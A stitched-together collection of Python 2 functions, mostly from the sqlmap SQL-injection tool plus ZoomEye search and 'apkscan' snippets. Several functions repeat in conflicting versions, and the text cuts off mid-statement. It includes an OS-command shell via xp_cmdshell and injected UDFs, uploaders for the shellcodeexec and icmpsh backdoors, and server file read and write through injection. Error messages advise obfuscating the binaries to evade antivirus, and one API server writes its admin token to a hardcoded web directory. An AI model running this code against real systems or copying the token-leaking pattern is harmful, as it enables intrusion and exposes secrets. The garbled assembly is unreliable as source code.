def main(): """ Main function of apkscan when running from command line. """ try: paths.ROOT_PATH = module_path() set_paths() # Store original command line options for possible later restoration cmd_options.update(cmd_parser().__dict__) init_options(cmd_options) banner() data_stdout("[*] starting at %s\n\n" % time.strftime("%X"), forceOutput=True) init() start() except ApkscanUserQuitException: err_msg = "user quit" logger.error(err_msg) except ApkscanBaseException, ex: err_msg = get_unicode(ex.message) logger.critical(err_msg) sys.exit(1)
def sqlShell(self):
    infoMsg = "calling %s shell. To quit type " % kb.dbms
    infoMsg += "'x' or 'q' and press ENTER"
    logger.info(infoMsg)

    autoCompletion(sqlShell=True)

    while True:
        query = None

        try:
            query = raw_input("sql> ")
        except KeyboardInterrupt:
            print
            errMsg = "user aborted"
            logger.error(errMsg)
        except EOFError:
            print
            errMsg = "exit"
            logger.error(errMsg)
            break

        if not query:
            continue

        if query.lower() in ("x", "q", "exit", "quit"):
            break

        output = self.sqlQuery(query)

        if output and output != "Quit":
            dumper.string(query, output)
        elif output != "Quit":
            print "No output"

def update():
    if not conf.updateAll:
        return

    rootDir = paths.SQLMAP_ROOT_PATH

    infoMsg = "updating sqlmap to the latest development version from the "
    infoMsg += "GitHub repository"
    logger.info(infoMsg)

    debugMsg = "sqlmap will try to update itself using 'git' command"
    logger.debug(debugMsg)

    dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))

    process = execute("git pull %s" % rootDir, shell=True, stdout=PIPE, stderr=PIPE)
    pollProcess(process, True)
    stdout, stderr = process.communicate()

    if not process.returncode:
        logger.info("%s the latest revision '%s'" % ("already at" if "Already" in stdout else "updated to", REVISION))
    else:
        logger.error("update could not be completed (%s)" % repr(stderr))

        if IS_WIN:
            infoMsg = "for Windows platform it's recommended "
            infoMsg += "to use a GitHub for Windows client for updating "
            infoMsg += "purposes (http://windows.github.com/)"
        else:
            infoMsg = "for Linux platform it's recommended "
            infoMsg += "to use a standard 'git' package (e.g.: 'sudo apt-get install git')"

        logger.info(infoMsg)

def runCase(switches=None, parse=None):
    retVal = True
    global failedItem

    initCase(switches)

    result = start()

    if result == False:  # if None, ignore
        logger.error("the test did not run")
        retVal = False

    if parse and retVal:
        ifile = open(conf.dumper.getOutputFile(), "r")
        content = ifile.read()
        ifile.close()

        for item in parse:
            if item.startswith("r'") and item.endswith("'"):
                if not re.search(item[2:-1], content, re.DOTALL):
                    retVal = False
                    failedItem = item
                    break

            elif content.find(item) < 0:
                retVal = False
                failedItem = item
                break

    cleanCase()

    return retVal

def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
    written = False

    self.checkDbmsOs()

    if localFile.endswith('_'):
        localFile = decloakToTemp(localFile)

    if conf.direct or isStackingAvailable():
        if isStackingAvailable():
            debugMsg = "going to upload the %s file with " % fileType
            debugMsg += "stacked query SQL injection technique"
            logger.debug(debugMsg)

        written = self.stackedWriteFile(localFile, remoteFile, fileType, forceCheck)
        self.cleanup(onlyFileTbl=True)

    elif isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and Backend.isDbms(DBMS.MYSQL):
        debugMsg = "going to upload the %s file with " % fileType
        debugMsg += "UNION query SQL injection technique"
        logger.debug(debugMsg)

        written = self.unionWriteFile(localFile, remoteFile, fileType, forceCheck)

    else:
        errMsg = "none of the SQL injection techniques detected can "
        errMsg += "be used to write files to the underlying file "
        errMsg += "system of the back-end %s server" % Backend.getDbms()
        logger.error(errMsg)

        return None

    return written

def getUsers(self): infoMsg = "fetching database users" logger.info(infoMsg) rootQuery = queries[Backend.getIdentifiedDbms()].users condition = (Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008"))) condition |= (Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema) if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: if condition: query = rootQuery.inband.query2 else: query = rootQuery.inband.query values = inject.getValue(query, blind=False, time=False) if not isNoneValue(values): kb.data.cachedUsers = [] for value in arrayizeValue(values): value = unArrayizeValue(value) if not isNoneValue(value): kb.data.cachedUsers.append(value) if not kb.data.cachedUsers and isInferenceAvailable() and not conf.direct: infoMsg = "fetching number of database users" logger.info(infoMsg) if condition: query = rootQuery.blind.count2 else: query = rootQuery.blind.count count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if count == 0: return kb.data.cachedUsers elif not isNumPosStrValue(count): errMsg = "unable to retrieve the number of database users" raise SqlmapNoneDataException(errMsg) plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) indexRange = getLimitRange(count, plusOne=plusOne) for index in indexRange: if Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MAXDB): query = rootQuery.blind.query % (kb.data.cachedUsers[-1] if kb.data.cachedUsers else " ") elif condition: query = rootQuery.blind.query2 % index else: query = rootQuery.blind.query % index user = unArrayizeValue(inject.getValue(query, union=False, error=False)) if user: kb.data.cachedUsers.append(user) if not kb.data.cachedUsers: errMsg = "unable to retrieve the database users" logger.error(errMsg) return kb.data.cachedUsers
def checkRegexp():
    if not conf.regexp:
        return True

    condition = (
                  kb.resumedQueries.has_key(conf.url) and
                  kb.resumedQueries[conf.url].has_key("Regular expression") and
                  kb.resumedQueries[conf.url]["Regular expression"][:-1] == conf.regexp
                )

    if condition:
        return True

    infoMsg = "testing if the provided regular expression matches within "
    infoMsg += "the target URL page content"
    logger.info(infoMsg)

    page = Request.queryPage(content=True)

    if re.search(conf.regexp, page, re.I | re.M):
        setRegexp()
        return True
    else:
        errMsg = "you provided '%s' as the regular expression to " % conf.regexp
        errMsg += "match, but such a regular expression does not have any "
        errMsg += "match within the target URL page content, please provide "
        errMsg += "another regular expression"
        logger.error(errMsg)

        return False

def apiSearch():
    headers = {
        'Authorization': 'JWT ' + conf.zoomeye.key,
    }
    try:
        target = setSearchStr()
        logger.debug("search url: {0}".format(target))
        count = int(conf.zoomeye.page)
        tmp = []
        for i in range(count):
            conf.zoomeye.page = i
            r = requests.get(target, headers=headers)
            r_decoded = json.loads(r.text)
            tmp.append(r_decoded)
            # TEST
            # TODO
            for x in r_decoded['matches']:
                logger.info("found ip: " + x['ip'])
                conf.zoomeye.ip_list.append(x['ip'])
        saveSearchResult(tmp)
    except Exception, e:
        if str(e.message) == 'matches':
            logger.info("account limit reached, exceeding the maximum number of allowed requests")
        else:
            logger.info(str(e.message))
            errMessage = str(e)
            logger.error(errMessage)
            raise ZoomeyeSearchException(errMessage)

def checkString():
    if not conf.string:
        return True

    condition = (
                  kb.resumedQueries.has_key(conf.url) and
                  kb.resumedQueries[conf.url].has_key("String") and
                  kb.resumedQueries[conf.url]["String"][:-1] == conf.string
                )

    if condition:
        return True

    infoMsg = "testing if the provided string is within the "
    infoMsg += "target URL page content"
    logger.info(infoMsg)

    page = Request.queryPage(content=True)

    if conf.string in page:
        setString()
        return True
    else:
        errMsg = "you provided '%s' as the string to " % conf.string
        errMsg += "match, but such a string is not within the target "
        errMsg += "URL page content, please provide another string"
        logger.error(errMsg)

        return False

def smokeTest(): """ This will run the basic smoke testing of a program """ retVal = True count, length = 0, 0 for _, _, files in os.walk(paths.SQLMAP_ROOT_PATH): for ifile in files: length += 1 for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH): for ifile in files: if os.path.splitext(ifile)[1].lower() == '.py' and ifile != '__init__.py': path = os.path.join(root, os.path.splitext(ifile)[0]) path = path.replace(paths.SQLMAP_ROOT_PATH, '.') path = path.replace(os.sep, '.').lstrip('.') try: __import__(path) module = sys.modules[path] except Exception, msg: retVal = False dataToStdout("\r") errMsg = "smoke test failed at importing module '%s' (%s):\n%s" % (path, os.path.join(paths.SQLMAP_ROOT_PATH, ifile), msg) logger.error(errMsg) else: # Run doc tests # Reference: http://docs.python.org/library/doctest.html (failure_count, test_count) = doctest.testmod(module) if failure_count > 0: retVal = False count += 1 status = '%d/%d (%d%s) ' % (count, length, round(100.0*count/length), '%') dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status))
def uploadShellcodeexec(self, web=False):
    self.shellcodeexecLocal = os.path.join(paths.SQLMAP_EXTRAS_PATH, "shellcodeexec")

    if Backend.isOs(OS.WINDOWS):
        self.shellcodeexecLocal = os.path.join(self.shellcodeexecLocal, "windows", "shellcodeexec.x%s.exe_" % "32")
    else:
        self.shellcodeexecLocal = os.path.join(self.shellcodeexecLocal, "linux", "shellcodeexec.x%s_" % Backend.getArch())

    __basename = "tmpse%s%s" % (self._randStr, ".exe" if Backend.isOs(OS.WINDOWS) else "")

    self.shellcodeexecRemote = "%s/%s" % (conf.tmpPath, __basename)
    self.shellcodeexecRemote = ntToPosixSlashes(normalizePath(self.shellcodeexecRemote))

    logger.info("uploading shellcodeexec to '%s'" % self.shellcodeexecRemote)

    if web:
        written = self.webUpload(self.shellcodeexecRemote, os.path.split(self.shellcodeexecRemote)[0], filepath=self.shellcodeexecLocal)
    else:
        written = self.writeFile(self.shellcodeexecLocal, self.shellcodeexecRemote, "binary", forceCheck=True)

    if written is not True:
        errMsg = "there has been a problem uploading shellcodeexec, it "
        errMsg += "looks like the binary file has not been written "
        errMsg += "on the database underlying file system or an AV has "
        errMsg += "flagged it as malicious and removed it. In such a case "
        errMsg += "it is recommended to recompile shellcodeexec with "
        errMsg += "slight modification to the source code or pack it "
        errMsg += "with an obfuscator software"
        logger.error(errMsg)

        return False
    else:
        logger.info("shellcodeexec successfully uploaded")
        return True

def login():
    data = {}

    if conf.user:
        if not conf.passwd:
            conf.passwd = raw_input('[-] input password: ')
        data = {
            'username': conf.user,
            'password': conf.passwd
        }

    data_encoded = json.dumps(data)

    try:
        r = requests.post(url=conf.zoomeye.login, data=data_encoded)
        r_decoded = json.loads(r.text)

        if r_decoded.has_key("access_token"):
            conf.zoomeye.key = r_decoded['access_token']
            saveStrToFile(paths.APP_KEY_FILE, conf.zoomeye.key)
            return
        else:
            errMessage = r_decoded["message"]
            logger.error(errMessage)
            setLoginStr()
            login()
    except Exception, e:
        errMessage = "login error.\n"
        errMessage += str(e)
        errMessage += "\nPlease try it again"
        logger.error(errMessage)
        setLoginStr()
        login()

def uploadIcmpshSlave(self, web=False):
    ICMPsh._initVars(self)
    self._randStr = randomStr(lowercase=True)
    self._icmpslaveRemoteBase = "tmpi%s.exe" % self._randStr

    self._icmpslaveRemote = "%s/%s" % (conf.tmpPath, self._icmpslaveRemoteBase)
    self._icmpslaveRemote = ntToPosixSlashes(normalizePath(self._icmpslaveRemote))

    logger.info("uploading icmpsh slave to '%s'" % self._icmpslaveRemote)

    if web:
        written = self.webUpload(self._icmpslaveRemote, os.path.split(self._icmpslaveRemote)[0], filepath=self._icmpslave)
    else:
        written = self.writeFile(self._icmpslave, self._icmpslaveRemote, "binary", forceCheck=True)

    if written is not True:
        errMsg = "there has been a problem uploading icmpsh, it "
        errMsg += "looks like the binary file has not been written "
        errMsg += "on the database underlying file system or an AV has "
        errMsg += "flagged it as malicious and removed it. In such a case "
        errMsg += "it is recommended to recompile icmpsh with slight "
        errMsg += "modification to the source code or pack it with an "
        errMsg += "obfuscator software"
        logger.error(errMsg)

        return False
    else:
        logger.info("icmpsh successfully uploaded")
        return True

def apiSearch():
    headers = {
        'Authorization': 'JWT ' + conf.zoomeye.key,
    }
    try:
        target = setSearchStr()
        logger.debug("search url: {0}".format(target))
        count = int(conf.zoomeye.page)
        tmp = []
        resultCount = 0
        for i in range(count):
            conf.zoomeye.page = i
            r = requests.get(target, headers=headers)
            r_decoded = json.loads(r.text)
            resultCount += len(r_decoded["matches"])
            tmp.append(r_decoded)
        saveSearchResult(tmp)
        logger.info("search results count: {0}".format(resultCount))
    except Exception, e:
        if str(e.message) == 'matches':
            logger.info("account limit reached, exceeding the maximum number of allowed requests")
        else:
            logger.info(str(e.message))
            errMessage = str(e)
            logger.error(errMessage)
            raise ZoomeyeSearchException(errMessage)

def _webFileStreamUpload(self, stream, destFileName, directory):
    stream.seek(0)  # Rewind

    try:
        setattr(stream, "name", destFileName)
    except TypeError:
        pass

    if self.webApi in getPublicTypeMembers(WEB_API, True):
        multipartParams = {
            "upload": "1",
            "file": stream,
            "uploadDir": directory,
        }

        if self.webApi == WEB_API.ASPX:
            multipartParams['__EVENTVALIDATION'] = kb.data.__EVENTVALIDATION
            multipartParams['__VIEWSTATE'] = kb.data.__VIEWSTATE

        page, _, _ = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False)

        if "File uploaded" not in page:
            warnMsg = "unable to upload the file through the web file "
            warnMsg += "stager to '%s'" % directory
            logger.warn(warnMsg)
            return False
        else:
            return True
    else:
        logger.error("sqlmap hasn't got a web backdoor nor a web file stager for %s" % self.webApi)
        return False

def server(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, adapter=RESTAPI_DEFAULT_ADAPTER):
    """
    REST-JSON API server
    """

    DataStore.admin_id = hexencode(os.urandom(16))
    Database.filepath = tempfile.mkstemp(prefix="sqlmapipc-", text=False)[1]

    # Persist the admin id to a known location; this is considered safe
    # because the API is only available locally
    file_object = open('/www/xseclab.com/termite/.sqlmapadminid', 'w')
    file_object.write(DataStore.admin_id)
    file_object.close()

    logger.info("Running REST-JSON API server at '%s:%d'.." % (host, port))
    logger.info("Admin ID: %s" % DataStore.admin_id)
    logger.debug("IPC database: %s" % Database.filepath)

    # Initialize IPC database
    DataStore.current_db = Database()
    DataStore.current_db.connect()
    DataStore.current_db.init()

    # Run RESTful API
    try:
        if adapter == "gevent":
            from gevent import monkey
            monkey.patch_all()
        elif adapter == "eventlet":
            import eventlet
            eventlet.monkey_patch()
        logger.debug("Using adapter '%s' to run bottle" % adapter)
        run(host=host, port=port, quiet=True, debug=False, server=adapter)
    except socket.error, ex:
        if "already in use" in getSafeExString(ex):
            logger.error("Address already in use ('%s:%s')" % (host, port))
        else:
            raise

def writeFile(self, localFile, remoteFile, fileType=None):
    self.checkDbmsOs()

    if localFile.endswith("_"):
        content = decloak(localFile)
        _ = os.path.split(localFile[:-1])[-1]
        prefix, suffix = os.path.splitext(_)
        handle, localFile = tempfile.mkstemp(prefix=prefix, suffix=suffix)
        os.close(handle)

        with open(localFile, "w+b") as f:
            f.write(content)

    if conf.direct or isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED):
        if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED):
            debugMsg = "going to upload the %s file with " % fileType
            debugMsg += "stacked query SQL injection technique"
            logger.debug(debugMsg)

        self.stackedWriteFile(localFile, remoteFile, fileType)
        self.cleanup(onlyFileTbl=True)

    elif isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and Backend.isDbms(DBMS.MYSQL):
        debugMsg = "going to upload the %s file with " % fileType
        debugMsg += "UNION query SQL injection technique"
        logger.debug(debugMsg)

        self.unionWriteFile(localFile, remoteFile, fileType)

    else:
        errMsg = "none of the SQL injection techniques detected can "
        errMsg += "be used to write files to the underlying file "
        errMsg += "system of the back-end %s server" % Backend.getDbms()
        logger.error(errMsg)

        return None

def server(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, server_name="wsgiref"):
    """
    REST-JSON API server
    """

    DataStore.admin_id = hexencode(os.urandom(16))
    Database.filepath = tempfile.mkstemp(prefix="sqlmapipc-", text=False)[1]

    logger.info("Running REST-JSON API server at '%s:%d'.." % (host, port))
    logger.info("Admin ID: %s" % DataStore.admin_id)
    logger.debug("IPC database: %s" % Database.filepath)

    # Initialize IPC database
    DataStore.current_db = Database()
    DataStore.current_db.connect()
    DataStore.current_db.init()

    # Run RESTful API
    try:
        if server_name == "gevent":
            from gevent import monkey
            monkey.patch_all()
        elif server_name == "eventlet":
            import eventlet
            eventlet.monkey_patch()
        logger.debug("using adapter '{0}' to run bottle".format(server_name))
        run(host=host, port=port, quiet=True, debug=False, server=server_name)
    except socket.error, ex:
        if "already in use" in getSafeExString(ex):
            logger.error("Address already in use ('%s:%s')" % (host, port))
        else:
            raise

def put(self, src, dest):
    f = None
    try:
        f = open(src, 'rb')
        self.handle.storbinary('STOR %s' % dest, f)
    except:
        err_msg = "ftp upload of file '%s' failed!" % src
        logger.error(err_msg)
    finally:
        # guard against 'f' being undefined when open() itself fails
        if f:
            f.close()

def shell(self):
    if self.webBackdoorUrl and not isStackingAvailable():
        infoMsg = "calling OS shell. To quit type "
        infoMsg += "'x' or 'q' and press ENTER"
        logger.info(infoMsg)
    else:
        if Backend.isDbms(DBMS.PGSQL) and self.checkCopyExec():
            infoMsg = "going to use 'COPY ... FROM PROGRAM ...' "
            infoMsg += "command execution"
            logger.info(infoMsg)
        elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
            infoMsg = "going to use injected user-defined functions "
            infoMsg += "'sys_eval' and 'sys_exec' for operating system "
            infoMsg += "command execution"
            logger.info(infoMsg)
        elif Backend.isDbms(DBMS.MSSQL):
            infoMsg = "going to use extended procedure 'xp_cmdshell' for "
            infoMsg += "operating system command execution"
            logger.info(infoMsg)
        else:
            errMsg = "feature not yet implemented for the back-end DBMS"
            raise SqlmapUnsupportedFeatureException(errMsg)

        infoMsg = "calling %s OS shell. To quit type " % (Backend.getOs() or "Windows")
        infoMsg += "'x' or 'q' and press ENTER"
        logger.info(infoMsg)

    autoCompletion(AUTOCOMPLETE_TYPE.OS, OS.WINDOWS if Backend.isOs(OS.WINDOWS) else OS.LINUX)

    while True:
        command = None

        try:
            command = raw_input("os-shell> ")
            command = getUnicode(command, encoding=sys.stdin.encoding)
        except KeyboardInterrupt:
            print()
            errMsg = "user aborted"
            logger.error(errMsg)
        except EOFError:
            print()
            errMsg = "exit"
            logger.error(errMsg)
            break

        if not command:
            continue

        if command.lower() in ("x", "q", "exit", "quit"):
            break

        self.runCmd(command)

def readFile(self, rFile): fileContent = None self.checkDbmsOs() kb.fileReadMode = True if conf.direct or isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED): if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED): debugMsg = "going to read the file with stacked query SQL " debugMsg += "injection technique" logger.debug(debugMsg) fileContent = self.stackedReadFile(rFile) elif Backend.isDbms(DBMS.MYSQL): debugMsg = "going to read the file with a non-stacked query " debugMsg += "SQL injection technique" logger.debug(debugMsg) fileContent = self.nonStackedReadFile(rFile) else: errMsg = "none of the SQL injection techniques detected can " errMsg += "be used to read files from the underlying file " errMsg += "system of the back-end %s server" % Backend.getDbms() logger.error(errMsg) return None kb.fileReadMode = False if fileContent in ( None, "" ) and not Backend.isDbms(DBMS.PGSQL): self.cleanup(onlyFileTbl=True) return elif isListLike(fileContent): newFileContent = "" for chunk in fileContent: if isListLike(chunk): if len(chunk) > 0: chunk = chunk[0] else: chunk = "" if chunk: newFileContent += chunk fileContent = newFileContent fileContent = self.__unhexString(fileContent) rFilePath = dataToOutFile(fileContent) if not Backend.isDbms(DBMS.PGSQL): self.cleanup(onlyFileTbl=True) return rFilePath
def exceptionHandledFunction(threadFunction, silent=False):
    try:
        threadFunction()
    except KeyboardInterrupt:
        kb.threadContinue = False
        kb.threadException = True
        raise
    except Exception, ex:
        if not silent:
            logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message))

def __unhexString(self, hexStr):
    if len(hexStr) % 2 != 0:
        errMsg = "for some reason(s) sqlmap retrieved an odd-length "
        errMsg += "hexadecimal string which it is not able to convert "
        errMsg += "to raw string"
        logger.error(errMsg)

        return hexStr

    return binascii.unhexlify(hexStr)

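# Illustration (not from the original code) of the guard in __unhexString above:
# only even-length hexadecimal strings can be decoded, so odd-length input is
# returned unchanged instead of letting unhexlify raise.
import binascii

assert binascii.unhexlify("414243") == b"ABC"   # even length decodes fine
try:
    binascii.unhexlify("4142433")               # odd length cannot be decoded
except (binascii.Error, TypeError):
    pass
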
def exceptionHandledFunction(threadFunction):
    try:
        threadFunction()
    except KeyboardInterrupt:
        kb.threadContinue = False
        kb.threadException = True
        raise
    except Exception, ex:
        # thread is just going to be silently killed
        logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message))

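# A hypothetical usage sketch (everything except exceptionHandledFunction is an
# assumption): the wrapper above is intended to be installed as the thread
# target so that worker exceptions are logged instead of disappearing, while
# Ctrl+C still flips the shared kb flags and propagates.
import threading

def _worker():  # placeholder for a real per-thread task
    pass

threads = []
for _ in range(4):
    t = threading.Thread(target=exceptionHandledFunction, args=(_worker,))
    t.start()
    threads.append(t)

for t in threads:
    t.join()
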
def downloadThread(): try: while conf.threadContinue: idxlock.acquire() if index[0] >= length: idxlock.release() return index[0] += 1 curidx = index[0] idxlock.release() if conf.threadContinue: charStart = time.time() val = getChar(curidx) if val is None: raise sqlmapValueException, "failed to get character at index %d (expected %d total)" % (curidx, length) else: break value[curidx-1] = val if conf.threadContinue: if showEta: etaProgressUpdate(time.time() - charStart, index[0]) elif conf.verbose >= 1: startCharIndex = 0 endCharIndex = 0 for i in xrange(length): if value[i] is not None: endCharIndex = max(endCharIndex, i) output = '' if endCharIndex > conf.progressWidth: startCharIndex = endCharIndex - conf.progressWidth count = 0 for i in xrange(startCharIndex, endCharIndex): output += '_' if value[i] is None else value[i] for i in xrange(length): count += 1 if value[i] is not None else 0 if startCharIndex > 0: output = '..' + output[2:] if endCharIndex - startCharIndex == conf.progressWidth: output = output[:-2] + '..' output += '_' * (min(length, conf.progressWidth) - len(output)) status = ' %d/%d (%d%s)' % (count, length, round(100.0*count/length), '%') output += status if count != length else " "*len(status) iolock.acquire() dataToStdout("\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), output)) iolock.release() except (sqlmapConnectionException, sqlmapValueException), errMsg: conf.threadException = True logger.error("thread %d: %s" % (numThread + 1, errMsg))
def smokeTest(): """ Runs the basic smoke testing of a program """ retVal = True count, length = 0, 0 if not checkIntegrity(): retVal = False for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH): if any(_ in root for _ in ("thirdparty", "extra")): continue for filename in files: if os.path.splitext(filename)[1].lower() == ".py" and filename != "__init__.py": length += 1 for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH): if any(_ in root for _ in ("thirdparty", "extra")): continue for filename in files: if os.path.splitext(filename)[1].lower() == ".py" and filename != "__init__.py": path = os.path.join(root, os.path.splitext(filename)[0]) path = path.replace(paths.SQLMAP_ROOT_PATH, '.') path = path.replace(os.sep, '.').lstrip('.') try: __import__(path) module = sys.modules[path] except Exception as ex: retVal = False dataToStdout("\r") errMsg = "smoke test failed at importing module '%s' (%s):\n%s" % (path, os.path.join(root, filename), ex) logger.error(errMsg) else: # Run doc tests # Reference: http://docs.python.org/library/doctest.html (failure_count, test_count) = doctest.testmod(module) if failure_count > 0: retVal = False count += 1 status = '%d/%d (%d%%) ' % (count, length, round(100.0 * count / length)) dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status)) clearConsoleLine() if retVal: logger.info("smoke test final result: PASSED") else: logger.error("smoke test final result: FAILED") return retVal
def __updateSqlmap(): rootDir = paths.SQLMAP_ROOT_PATH infoMsg = "updating sqlmap to latest development version from the " infoMsg += "subversion repository" logger.info(infoMsg) try: import pysvn debugMsg = "sqlmap will update itself using installed python-svn " debugMsg += "third-party library, http://pysvn.tigris.org/" logger.debug(debugMsg) def notify(event_dict): action = str(event_dict['action']) index = action.find('_') prefix = action[index + 1].upper() if index != -1 else action.capitalize() if action.find('_update') != -1: return if action.find('_completed') == -1: print "%s\t%s" % (prefix, event_dict['path']) else: revision = str(event_dict['revision']) index = revision.find('number ') if index != -1: revision = revision[index+7:].strip('>') logger.info('updated to the latest revision %s' % revision) client = pysvn.Client() client.callback_notify = notify client.update(rootDir) except ImportError, _: debugMsg = "sqlmap will try to update itself using 'svn' command" logger.debug(debugMsg) process = execute("svn update %s" % rootDir, shell=True, stdout=PIPE, stderr=PIPE) dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X")) pollProcess(process) svnStdout, svnStderr = process.communicate() if svnStderr: errMsg = svnStderr.strip() logger.error(errMsg) elif svnStdout: revision = re.search("revision\s+([\d]+)", svnStdout, re.I) if revision: logger.info('updated to the latest revision %s' % revision.group(1))
def server(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, adapter=RESTAPI_DEFAULT_ADAPTER, username=None, password=None):
    """
    REST-JSON API server
    """

    DataStore.admin_token = hexencode(os.urandom(16))
    DataStore.username = username
    DataStore.password = password

    _, Database.filepath = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.IPC, text=False)
    os.close(_)

    if port == 0:  # random
        with contextlib.closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
            s.bind((host, 0))
            port = s.getsockname()[1]

    logger.info("Running REST-JSON API server at '%s:%d'.." % (host, port))
    logger.info("Admin (secret) token: %s" % DataStore.admin_token)
    logger.debug("IPC database: '%s'" % Database.filepath)

    # Initialize IPC database
    DataStore.current_db = Database()
    DataStore.current_db.connect()
    DataStore.current_db.init()

    # Run RESTful API
    try:
        # Supported adapters: aiohttp, auto, bjoern, cgi, cherrypy, diesel, eventlet,
        # fapws3, flup, gae, gevent, geventSocketIO, gunicorn, meinheld, paste,
        # rocket, tornado, twisted, waitress, wsgiref
        # Reference: https://bottlepy.org/docs/dev/deployment.html || bottle.server_names
        if adapter == "gevent":
            from gevent import monkey
            monkey.patch_all()
        elif adapter == "eventlet":
            import eventlet
            eventlet.monkey_patch()
        logger.debug("Using adapter '%s' to run bottle" % adapter)
        run(host=host, port=port, quiet=True, debug=True, server=adapter)
    except socket.error as ex:
        if "already in use" in getSafeExString(ex):
            logger.error("Address already in use ('%s:%s')" % (host, port))
        else:
            raise
    except ImportError:
        if adapter.lower() not in server_names:
            errMsg = "Adapter '%s' is unknown. " % adapter
            errMsg += "List of supported adapters: %s" % ', '.join(sorted(list(server_names.keys())))
        else:
            errMsg = "Server support for adapter '%s' is not installed on this system " % adapter
            errMsg += "(Note: you can try to install it with 'sudo apt-get install python-%s' or 'sudo pip install %s')" % (adapter, adapter)
        logger.critical(errMsg)

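# Standalone sketch of the "port == 0" trick used above (plain sockets only, no
# sqlmap imports): binding to port 0 asks the OS for any free port, and
# getsockname() reveals which port was picked before the real server binds to it.
import contextlib
import socket

def pick_free_port(host="127.0.0.1"):
    with contextlib.closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
        s.bind((host, 0))
        return s.getsockname()[1]
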
def get(self, dest):
    ret = None
    bufsize = 1024
    file_save = os.path.join(paths.OUTPUT_PATH, dest)
    try:
        # use a context manager so the local file is flushed and closed
        with open(file_save, 'wb') as f:
            self.handle.retrbinary('RETR %s' % os.path.basename(dest), f.write, bufsize)
        ret = file_save
    except:
        err_msg = "ftp download of file '%s' failed!" % dest
        logger.error(err_msg)
    return ret

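# A minimal sketch (all names here are assumptions) of the kind of wrapper the
# put()/get() methods above appear to belong to: 'self.handle' is used as a
# logged-in ftplib.FTP connection, so a surrounding class could look like this,
# with put() and get() defined on it as shown above.
import ftplib

class FtpClient(object):
    def __init__(self, host, user, passwd):
        self.handle = ftplib.FTP(host)
        self.handle.login(user, passwd)

    def close(self):
        self.handle.quit()
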
def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT):
    """
    REST-JSON API client
    """

    addr = "http://%s:%d" % (host, port)
    logger.info("starting debug REST-JSON client to '%s'..." % addr)

    # TODO: write a simple client with requests, for now use curl from command line
    logger.error("not yet implemented, use curl from command line instead for now, for example:")
    print "\n\t$ curl http://%s:%d/task/new" % (host, port)
    print "\t$ curl -H \"Content-Type: application/json\" -X POST -d '{\"url\": \"http://testphp.vulnweb.com/artists.php?artist=1\"}' http://%s:%d/scan/:taskid/start" % (host, port)
    print "\t$ curl http://%s:%d/scan/:taskid/output" % (host, port)
    print "\t$ curl http://%s:%d/scan/:taskid/log\n" % (host, port)

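# A minimal sketch of the TODO above -- driving the REST-JSON API with
# 'requests' instead of curl. The endpoints mirror the curl examples printed by
# client(); field names such as "taskid" are assumptions based on them.
import requests

def start_scan(addr, target_url):
    taskid = requests.get("%s/task/new" % addr).json().get("taskid")
    requests.post("%s/scan/%s/start" % (addr, taskid), json={"url": target_url})
    return taskid

def scan_log(addr, taskid):
    return requests.get("%s/scan/%s/log" % (addr, taskid)).json()

# usage: start_scan("http://127.0.0.1:8775", "http://testphp.vulnweb.com/artists.php?artist=1")
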
def start(): """ This function calls a function that performs checks on both URL stability and all GET, POST, Cookie and User-Agent parameters to check if they are dynamic and SQL injection affected """ if conf.direct: initTargetEnv() setupTargetEnv() action() return True if conf.url and not any((conf.forms, conf.crawlDepth)): kb.targets.add((conf.url, conf.method, conf.data, conf.cookie, None)) if conf.configFile and not kb.targets: errMsg = "you did not edit the configuration file properly, set " errMsg += "the target URL, list of targets or google dork" logger.error(errMsg) return False if kb.targets and len(kb.targets) > 1: infoMsg = "sqlmap got a total of %d targets" % len(kb.targets) logger.info(infoMsg) hostCount = 0 initialHeaders = list(conf.httpHeaders) for targetUrl, targetMethod, targetData, targetCookie, targetHeaders in kb.targets: try: conf.url = targetUrl conf.method = targetMethod.upper( ) if targetMethod else targetMethod conf.data = targetData conf.cookie = targetCookie conf.httpHeaders = list(initialHeaders) conf.httpHeaders.extend(targetHeaders or []) initTargetEnv() parseTargetUrl() testSqlInj = False if PLACE.GET in conf.parameters and not any( [conf.data, conf.testParameter]): for parameter in re.findall( r"([^=]+)=([^%s]+%s?|\Z)" % (re.escape(conf.paramDel or "") or DEFAULT_GET_POST_DELIMITER, re.escape(conf.paramDel or "") or DEFAULT_GET_POST_DELIMITER), conf.parameters[PLACE.GET]): paramKey = (conf.hostname, conf.path, PLACE.GET, parameter[0]) if 